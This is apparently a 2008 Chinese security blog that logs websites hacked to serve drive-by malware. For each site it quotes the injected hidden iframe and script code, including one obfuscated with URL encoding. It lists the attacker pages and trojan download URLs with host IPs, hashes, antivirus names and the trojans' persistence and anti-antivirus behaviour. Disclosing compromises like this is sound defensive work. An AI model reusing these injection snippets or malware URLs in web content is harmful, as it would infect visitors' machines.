欢迎光临.
[
2006/11/17 20:36 | by icka ]
2006/11/17 20:36 | by icka ]
2008.11.21挂马资讯
[ 2008/11/21 00:50 | by icka ]
2008/11/21 00:50 | by icka ]
http://www.menhu98.cn/
包含恶意网页
<iframe src=http://www.nznylsf.cn/zzll/14.htm width=50 height=0 border=0></iframe>
下载病毒
http://www.oiuytr.net/new/a141.css
又是这个~~
包含恶意网页
<iframe src=http://www.nznylsf.cn/zzll/14.htm width=50 height=0 border=0></iframe>
下载病毒
http://www.oiuytr.net/new/a141.css
又是这个~~
2008.11.21挂马资讯
[ 2008/11/21 00:30 | by icka ]
2008/11/21 00:30 | by icka ]
http://www.mp4no1.cn 知心女性网
包含恶意网页
<iframe src=http://www.stratra.cn/log/m1.htm?26 width=100 height=0></iframe>
下载病毒
http://www.smmttx.cn/set.exe
主机IP:59.34.198.85
Trojan.KillAV [Symantec]
Trojan-Downloader.Win32.Agent.apqu [Kaspersky Lab]
包含恶意网页
<iframe src=http://www.stratra.cn/log/m1.htm?26 width=100 height=0></iframe>
下载病毒
http://www.smmttx.cn/set.exe
主机IP:59.34.198.85
Trojan.KillAV [Symantec]
Trojan-Downloader.Win32.Agent.apqu [Kaspersky Lab]
挂马资讯统计2008.11.20
[ 2008/11/20 14:50 | by icka ]
2008/11/20 14:50 | by icka ]
http://www.92sytd.cn/
被植入恶意代码
<iframe src=http://www.stratra.cn/log/m1.htm?13 width=100 height=0></iframe>
下载病毒
http://www.9sys9.cn/uninst.exe
主机IP:59.34.198.85
病毒连接已经失效
被植入恶意代码
<iframe src=http://www.stratra.cn/log/m1.htm?13 width=100 height=0></iframe>
下载病毒
http://www.9sys9.cn/uninst.exe
主机IP:59.34.198.85
病毒连接已经失效
挂马资讯2008.11.20
[ 2008/11/20 14:33 | by icka ]
2008/11/20 14:33 | by icka ]
http://mqidian.com/ 梦起点小说论坛
包含
<script src="include/javascript/common.js" type="text/javascript"></script>
植入恶意代码
document.write("<iframe src=http://%61%6C%69%6D%6F%6D%61%2E%63%6F%6D/stat.htm width=100 height=0></iframe>");}
下载木马
http://down.19490101.cn/dd/fd.css
主机IP:121.14.145.114
File MD5: 0x10F74F19AB586E436FDCD95B70D029F5
Filesize: 37,692 bytes
Trojan.KillAV [Symantec]
Mal/Behav-214 [Sophos]
TrojanDownloader:Win32/Isnev [Microsoft]
Trojan-Downloader.Win32.Isnev [Ikarus]
Trojan.Peed.Gen (BD 引擎)
Trojan.Peed.Gen (Kaspersky Lab)
包含
<script src="include/javascript/common.js" type="text/javascript"></script>
植入恶意代码
document.write("<iframe src=http://%61%6C%69%6D%6F%6D%61%2E%63%6F%6D/stat.htm width=100 height=0></iframe>");}
下载木马
http://down.19490101.cn/dd/fd.css
主机IP:121.14.145.114
File MD5: 0x10F74F19AB586E436FDCD95B70D029F5
Filesize: 37,692 bytes
Trojan.KillAV [Symantec]
Mal/Behav-214 [Sophos]
TrojanDownloader:Win32/Isnev [Microsoft]
Trojan-Downloader.Win32.Isnev [Ikarus]
Trojan.Peed.Gen (BD 引擎)
Trojan.Peed.Gen (Kaspersky Lab)
挂马资讯2008.11.20
[ 2008/11/20 14:14 | by icka ]
2008/11/20 14:14 | by icka ]
www.43232.cn
被植入恶意代码
<script type="text/javascript" language="javascript" src="js/foot.js"></script>
内有
document.writeln('<iframe src=http://www.2009haosf.cn/soft/z.html width=50 height=0></iframe>');
剩下就和
http://www.icka.com.cn/blog/read.php?172差不多了
被植入恶意代码
<script type="text/javascript" language="javascript" src="js/foot.js"></script>
内有
document.writeln('<iframe src=http://www.2009haosf.cn/soft/z.html width=50 height=0></iframe>');
剩下就和
http://www.icka.com.cn/blog/read.php?172差不多了
挂马资讯2008.11.20
[ 2008/11/20 13:40 | by icka ]
2008/11/20 13:40 | by icka ]
http://www.2009haosf.cn/mtv/
被植入恶意代码
<script language="JavaScript"src="http://www.flashm88.cn/vote/2.js"></script>
2.JS包含
document.write('<iframe src=http://eeepppp.cn/1/zz10.htm?222 width=50 height=0 border=0></iframe>')
恶意网页:
http://eeepppp.cn/1/zz10.htm?222
下载木马:
http://eeepppp.cn/1.exe
主机IP:121.14.156.59
File MD5: 0x334081F907843FDAFBCF74B44AE6CE0E
Filesize: 38,484 bytes
Trojan.Dropper [Symantec]
New Malware.aj [McAfee]
Mal/Autorun-C [Sophos]
Trojan-Spy.Win32.Hitpop.C [Ikarus]
packed with: PE_Patch [Kaspersky Lab]
Win32.Worm.Autorun.NY [BD]
生成
%Windir%\system\mvjaj32dla.dll
"%Windir%\system\llwzjy081120.exe
在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run下建立开机加载项
IFEO劫持360tray.exe、DrRtp.exe、QQDoctor.exe
从http://www.a3168.com/mydown.asp?ver=081120&tgid=1&address=00-00-00-00-00-00
下载病毒
对象: shengji.exe
病毒: Win32.Worm.Autorun.NY (BD 引擎)
对象: Server.exe
病毒: Backdoor.Win32.Hupigon.epms (KAV 引擎), Generic.Malware.SFBprng.159CB437 (BD 引擎)
被植入恶意代码
<script language="JavaScript"src="http://www.flashm88.cn/vote/2.js"></script>
2.JS包含
document.write('<iframe src=http://eeepppp.cn/1/zz10.htm?222 width=50 height=0 border=0></iframe>')
恶意网页:
http://eeepppp.cn/1/zz10.htm?222
下载木马:
http://eeepppp.cn/1.exe
主机IP:121.14.156.59
File MD5: 0x334081F907843FDAFBCF74B44AE6CE0E
Filesize: 38,484 bytes
Trojan.Dropper [Symantec]
New Malware.aj [McAfee]
Mal/Autorun-C [Sophos]
Trojan-Spy.Win32.Hitpop.C [Ikarus]
packed with: PE_Patch [Kaspersky Lab]
Win32.Worm.Autorun.NY [BD]
生成
%Windir%\system\mvjaj32dla.dll
"%Windir%\system\llwzjy081120.exe
在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run下建立开机加载项
IFEO劫持360tray.exe、DrRtp.exe、QQDoctor.exe
从http://www.a3168.com/mydown.asp?ver=081120&tgid=1&address=00-00-00-00-00-00
下载病毒
对象: shengji.exe
病毒: Win32.Worm.Autorun.NY (BD 引擎)
对象: Server.exe
病毒: Backdoor.Win32.Hupigon.epms (KAV 引擎), Generic.Malware.SFBprng.159CB437 (BD 引擎)
